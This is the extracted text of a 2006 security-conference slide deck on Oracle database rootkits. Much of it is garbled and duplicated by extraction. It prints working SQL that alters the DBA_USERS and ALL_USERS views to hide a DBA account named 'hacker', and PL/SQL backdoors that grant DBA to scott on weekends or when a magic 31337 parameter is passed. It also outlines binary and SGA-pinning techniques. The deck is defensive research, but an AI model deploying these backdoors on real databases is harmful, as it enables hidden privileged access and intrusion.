Professional Documents
Culture Documents
02-August-06
Alexander Kornbrust
Red Database Security GmbH
Agenda
Introduction
OS Rootkits
Database Rootkits 1.0
Execution Path
Modify Data Dictionary Objects
Advanced Database Rootkits 1.0
Database Rootkits 2.0
Modify Binaries
PL/SQL Native
Pinned PL/SQL Packages
Conclusion
Q/A
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 -2-
Introduction
Red-Database-Security GmbH
Founded Spring 2004
CEO Alexander Kornbrust
Specialized in Oracle Security
One of the leading company for Oracle Security
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 -3-
Introduction
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 -4-
Introduction
execute select * from select * from view; select * from select * from
view; view; view;
exec procedure
exec
execute
procedure
procedure
cd alter session
set
current_schema
=user01
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 -5-
Database ≈ Operating System
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 -6-
Operating System Rootkit
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 -7-
Introduction: OS Rootkit
without
without rootkit
rootkit with
with (Sony)
(Sony) rootkit
rootkit
[c:\>]#
[c:\>]# dir
dir /a
/a [c:\>]#
[c:\>]# dir
dir /a
/a
22.02.2006 21:29 <DIR>
22.02.2006 21:29 <DIR> backup
backup 22.02.2006 21:29 <DIR>
22.02.2006 21:29 <DIR> backup
backup
28.02.2006
28.02.2006 07:31
07:31 <DIR>
<DIR> Programme 28.02.2006
28.02.2006 07:31
Programme 07:31 <DIR>
<DIR> Programme
Programme
01.03.2006 10:36 <DIR>
01.03.2006 10:36 <DIR> WINDOWS 01.03.2006 10:36 <DIR>
WINDOWS 01.03.2006 10:36 <DIR> WINDOWS
WINDOWS
30.01.2006 15:57 <DIR>
30.01.2006 15:57 <DIR> Documents
30.01.2006
Documents 15:57 <DIR>
30.01.2006 15:57 <DIR> Documents
Documents
30.01.2006 16:00
30.01.2006 16:00 212 boot.ini30.01.2006 16:00
212 boot.ini30.01.2006 16:00 212 boot.ini
212 boot.ini
18.08.2001 11:00
18.08.2001 11:00 4.952 bootfont.bin
18.08.2001
4.952 bootfont.bin 11:00
18.08.2001 11:00 4.952
4.952 bootfont.bin
bootfont.bin
30.01.2006
30.01.2006 15:53
15:53 00 CONFIG.SYS
30.01.2006
30.01.2006 15:53
CONFIG.SYS 15:53 00 CONFIG.SYS
CONFIG.SYS
30.01.2006 17:11 471.232 $sys$rk.exe
30.01.2006 17:11 471.232 $sys$rk.exe
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 -8-
Introduction: OS Rootkit
without
without rootkit
rootkit with
with rootkit
rootkit
[root@picard
[root@picard root]#
root]# who
who [root@picard
[root@picard root]#
root]# who
who
root
root pts/0
pts/0 Apr
Apr 11 12:25
12:25 root
root pts/0
pts/0 Apr
Apr 11 12:25
12:25
root
root pts/1
pts/1 Apr
Apr 11 12:44
12:44 root
root pts/1
pts/1 Apr
Apr 11 12:44
12:44
root
root pts/1
pts/1 Apr
Apr 11 12:44
12:44 root
root pts/1
pts/1 Apr
Apr 11 12:44
12:44
ora
ora pts/3
pts/3 Mar
Mar 30
30 15:01
15:01 ora
ora pts/3
pts/3 Mar
Mar 30
30 15:01
15:01
hacker
hacker pts/3
pts/3 Feb
Feb 16
16 15:01
15:01
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 -9-
Migration of Rootkit
OS
OS Î
Î DB
DB
Hide
Hide OS
OS User
User Î
Î Hide
Hide Database
Database User
User
Hide
Hide Jobs
Jobs ÎÎ Hide
Hide Database
Database Jobs
Jobs
Hide
Hide Processes
Processes Î
Î Hide
Hide Database
Database Processes
Processes
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 10 -
Database Rootkit
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 11 -
Database Rootkit Evolution
1st Generation
Changes in the data dictionary (e.g. modification of a
view or procedure / change synonym)
– Presented at the Black Hat Europe 2005
2nd Generation
No change in the data dictionary (like views or
packages) required.
- Presented at the Black Hat USA 2006
3nd Generation
Modify database structures in memory. Official API
available since Oracle 10g Rel. 2.
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 12 -
Rootkit – 1st generation
Easy to implement
Easy to find
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 13 -
Oracle Execution Path
Name resolution:
Is there a local object in the current schema (table,
view, procedure, …) called dba_users?
Æ If yes, use it.
Is there a private synonym called dba_users?
Æ If yes, use it.
Is there a public synonym called dba_users?
Æ If yes, use it.
Is VPD in use?
Æ If yes, modify SQL Statement.
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 14 -
Oracle Execution Path
User 1 User n
Views Views
Public Synonyms
SYS
Views
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 15 -
Oracle Execution Path
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 16 -
Hide Database Users
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 17 -
Hide Database Users
SQL>
SQL> create
create user
user hacker
hacker identified
identified by
by hacker;
hacker;
SQL> grant dba to hacker;
SQL> grant dba to hacker;
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 18 -
Hide Database Users
k er
Ha c .
o
&C
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 19 -
Hide Database Users
k er
Ha c .
o
&C
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 20 -
Hide Database Users
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 21 -
Hide Database Users
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 22 -
Hide Database Users
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 23 -
Oracle Execution Path
Views Views
Public Synonyms
SYS
Views [4] and u.name != 'HACKER'
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 25 -
Hide Processes
SQL>
SQL> select
select sid,serial#,
sid,serial#, program
program from
from v$session;
v$session;
SID
SID SERIAL#
SERIAL# PROGRAM
PROGRAM
----- -------- ---------------------------------
----- -------- ---------------------------------
------------
------------
297
297 11337
11337 OMS
OMS
298
298 23019
23019 OMS
OMS
300
300 35
35 OMS
OMS
301
301 4 OMS
4 OMS
304
304 1739
1739 OMS
OMS
305
305 29265
29265 sqlplus.exe
sqlplus.exe
306
306 2186
2186 OMS
OMS
k er
Ha c . 307 30
&C
o 307 30 emagent@picard.rds (TNS
emagent@picard.rds (TNS V1
V1
308
308 69
69 OMS
OMS
310
310 5611
5611 OMS
OMS
311
311 49
49 OMS
OMS
[...]
[...]
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 26 -
Hide Processes
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 27 -
Hide Database Jobs
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 28 -
Hide Database Jobs
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 29 -
Hide Database Jobs
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 30 -
Hide Database Jobs
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 31 -
Hide Database Jobs
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 32 -
1. Gen Rootkit Examples
Modifying Views
Modifying (unwrapped) internal Oracle Packages
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 33 -
1. Gen Rootkit Example – modify views
EXECUTE
EXECUTE
DBMS_METADATA.SET_TRANSFORM_PARAM(DBMS_METADATA.SESSION_TRAN
DBMS_METADATA.SET_TRANSFORM_PARAM(DBMS_METADATA.SESSION_TRAN
SFORM,'STORAGE',false);
SFORM,'STORAGE',false);
spool
spool rk_source.sql
rk_source.sql
select
select
replace(cast(dbms_metadata.get_ddl('VIEW','ALL_USERS')
replace(cast(dbms_metadata.get_ddl('VIEW','ALL_USERS') as as
VARCHAR2(4000)),'where','where
VARCHAR2(4000)),'where','where u.name
u.name !=''HACKER''
!=''HACKER'' and
and ')
')
from dual union select '/' from dual;
from dual union select '/' from dual;
select
select
replace(cast(dbms_metadata.get_ddl('VIEW','DBA_USERS')
replace(cast(dbms_metadata.get_ddl('VIEW','DBA_USERS') as as
VARCHAR2(4000)),'where','where
VARCHAR2(4000)),'where','where u.name
u.name !=''HACKER''
!=''HACKER'' and
and ')
')
from dual union select '/' from dual;
from dual union select '/' from dual;
spool
spool off
off
create
create user
user hacker
hacker identified
identified by
by hacker_bh2006;
hacker_bh2006;
grant
grant dba
dba to
to hacker;
hacker;
we are here:
@rk_source.sql
@rk_source.sql
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 34 -
1. Gen Rootkit Example
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 35 -
1. Gen Rootkit Example
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 36 -
1. Gen Rootkit Example – via job
PROCEDURE
PROCEDUREENABLE
ENABLE(BUFFER_SIZE
(BUFFER_SIZEIN
ININTEGER
INTEGERDEFAULT
DEFAULT20000)
20000)
IS
IS
LSTATUS
LSTATUSINTEGER;
INTEGER;
LOCKID
LOCKID INTEGER;
INTEGER;
MYDAY VARCHAR2(10);
MYDAY VARCHAR2(10);
BEGIN
BEGIN
[…]
[…]
select
selectto_char(sysdate,'DAY')
to_char(sysdate,'DAY')into
intoMYDAY
MYDAYfrom
fromdual;
dual;
IF
IF(MYDAY
(MYDAYIN IN('SATURDAY','SUNDAY'))
('SATURDAY','SUNDAY'))
THEN
THEN
execute
executeimmediate
immediate'grant
'grantdba
dbato
toscott';
scott';
ELSE
ELSE
execute
executeimmediate
immediate'revoke
'revokedba
dbato
toscott';
scott';
END IF;
END IF;
ENABLED
ENABLED:=:=TRUE;
TRUE;
IF
IFBUFFER_SIZE
BUFFER_SIZE<<2000
2000THEN
THEN
BUF_SIZE
BUF_SIZE:=
:=2000;
2000;
we are here: […]
[…]
1 2 3 4 5
6 7 8 9 10 END;
03.08.2006
END;
- 37 -
1. Gen Rootkit Example
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 38 -
1. Gen Rootkit Example
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 39 -
1. Gen Rootkit Example – via parameter
PROCEDURE
PROCEDUREENABLE
ENABLE(BUFFER_SIZE
(BUFFER_SIZEIN
ININTEGER
INTEGERDEFAULT
DEFAULT20000)
20000)IS
IS
LSTATUS
LSTATUSINTEGER;
INTEGER;
LOCKID
LOCKID INTEGER;
INTEGER;
MYDAY VARCHAR2(10);
MYDAY VARCHAR2(10);
BEGIN
BEGIN
[…]
[…]
IF
IF(BUFFER_SIZE
(BUFFER_SIZE==31337)
31337)
THEN
THEN
BEGIN
BEGIN
execute
executeimmediate
immediate'grant
'grantdba
dbato
toscott';
scott';
execute
execute immediate alter user scottidentified
immediate alter user scott identifiedby
by
ora31337';
ora31337';
END
END
ELSE
ELSE
BEGIN
BEGIN
execute
executeimmediate
immediate'revoke
'revokedba
dbato
toscott';
scott';
execute
executeimmediate
immediate‘alter
‘alteruser
userscott
scottidentified
identifiedby
byXXX';
XXX';
END
END
END
ENDIF;IF;
ENABLED
ENABLED:=
:=TRUE;
TRUE;
[…]
[…]
we are here:
1 2 3 4 5 END;
6 7 8 9 10 03.08.2006END; - 40 -
1. Gen Rootkit Example
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 41 -
Rootkit – 2nd generation
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 42 -
Rootkit – 2nd generation
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 43 -
Rootkit – 2nd generation – modify binary
RDBMS
sys.user$
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 45 -
Rootkit – 2nd generation – modify binary
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 46 -
Rootkit – 2nd generation – modify binary
RDBMS
sys.aser$
RDBMS
sys.aser$
sys.user$
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 49 -
Rootkit – 2nd generation – modify binary
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 50 -
Rootkit – 2nd generation – modify binary
Shutdown database
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 51 -
Rootkit – 2nd generation – modify binary
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 52 -
Rootkit – 2nd generation – modify binary
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 53 -
Rootkit – 2nd generation – modify binary
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 54 -
Rootkit – 2nd generation – protection
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 55 -
Rootkit – 2nd generation – PL/SQL native
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 56 -
Rootkit – 2nd generation – PL/SQL native
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 57 -
Rootkit – 2nd generation – PL/SQL native
MYPROCEDURE_SCOTT___0.c
MYPROCEDURE__SCOTT___0.dll
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 59 -
Rootkit – 2nd gen. – PL/SQL native (10g)
PL/SQL
MYPROCEDURE alter procedure myprocedure compile;
MYPROCEDURE__
SCOTT___0.dll
MYPROCEDURE_SCOTT___0.c
MYPROCEDURE__SCOTT___0.dll
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 60 -
Rootkit – 2nd gen. – PL/SQL native (9i)
/*-----
/*----- Implementation
Implementation of
of Procedure
Procedure HELLO_NATIVE_COMPILATION
HELLO_NATIVE_COMPILATION -----*/
-----*/
## ifdef
ifdef __cplusplus
__cplusplus
extern
extern "C"
"C" {{
## endif
endif
## ifndef
ifndef PEN_ORACLE
PEN_ORACLE
## include
include <pen.h>
<pen.h>
## endif
endif
/*
/* Types
Types used
used in
in generated
generated code
code */
*/
typedef
typedef union
union {ub1
{ub1 st[252];
st[252]; size_t
size_t _si;
_si; void
void ** _vs;}
_vs;} PEN_State;
PEN_State;
typedef union {ub1 cup[208]; size_t _cu; void * _vc;} PEN_Cup;
typedef union {ub1 cup[208]; size_t _cu; void * _vc;} PEN_Cup;
typedef
typedef union
union {ub1
{ub1 slg[
slg[ 80];
80]; pen_buffer
pen_buffer p;}
p;} PEN_Buffer;
PEN_Buffer;
/*
/* Macros
Macros used
used in
in generated
generated code
code */
*/
#define
#define dl0
dl0 ((void
((void ***)
***) (PEN_Registers[
(PEN_Registers[ 3]))
3]))
#define dpf ((void ****) (PEN_Registers[ 5]))
#define dpf ((void ****) (PEN_Registers[ 5]))
#define
#define bit(x,
bit(x, y)
y) ((x)
((x) && (y))
(y))
#define
#define PETisstrnull(strhdl) \\
PETisstrnull(strhdl)
(!PMUflgnotnull(PETmut(strhdl))
(!PMUflgnotnull(PETmut(strhdl)) ||
|| !PETdat(strhdl)
!PETdat(strhdl) ||
|| !PETlen(strhdl))
!PETlen(strhdl))
#define
#define PMUflganynull(pmut) (bit((pmut)->plsmflg, (PLSFNULL || PLSFBADNULL)))
PMUflganynull(pmut) (bit((pmut)->plsmflg, (PLSFNULL PLSFBADNULL)))
#define
#define PMUflgnotnull(pmut)
PMUflgnotnull(pmut) (!bit((pmut)->plsmflg,
PLSFBADNULL))) (!bit((pmut)->plsmflg, (PLSFNULL
(PLSFNULL ||
we are here:
PLSFBADNULL)))
1 2 3 4 5
[…]
6 7 8 9 10 03.08.2006
[…] - 61 -
Rootkit – 2nd gen. – PL/SQL native (9i)
MYPROCEDURE
(backdoored)
MYPROCEDURE_SCOTT___0.c (backdoored)
MYPROCEDURE__SCOTT___0.dll (backdoored)
MYPROCEDURE_SCOTT___0.c (original)
MYPROCEDURE__SCOTT___0.dll (original)
MYPROCEDURE_SCOTT___0.c (original)
MYPROCEDURE__SCOTT___0.dll (backdoored)
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 65 -
Rootkit – 2nd gen. – Pinning
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 66 -
Rootkit – 2nd gen. – Pinning
SGA
MYPROCEDURE
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 67 -
Rootkit – 2nd gen. – Pinning
SGA
MYPROCEDURE
(backdoored)
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 68 -
Rootkit – 2nd gen. – Pinning
SGA
dbms_shared_p
MYPROCEDURE
ool.
(backdoored)
keep('MYPROCE
DURE')
MYPROCEDURE
(backdoored)
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 69 -
Rootkit – 2nd gen. – Pinning
SGA
MYPROCEDURE
(backdoored)
MYPROCEDURE
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 71 -
Rootkit – 2nd gen. – other possibilities I
(untested)
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 72 -
Rootkit – 2nd gen. – other possibilities I
(untested)
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 73 -
Rootkit – 3rd generation
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 74 -
Surviving Updates
we are here:
• …
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 75 -
Finding Rootkits
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 76 -
Conclusion
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 77 -
Q&A
Q&A
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 78 -
Contact
Alexander Kornbrust
CEO
Red-Database-Security GmbH
Bliesstrasse 16
D-66538 Neunkirchen
Germany
E-Mail: info@red-database-security.com
Web: www.red-database-security.com
we are here:
1 2 3 4 5
6 7 8 9 10 03.08.2006 - 79 -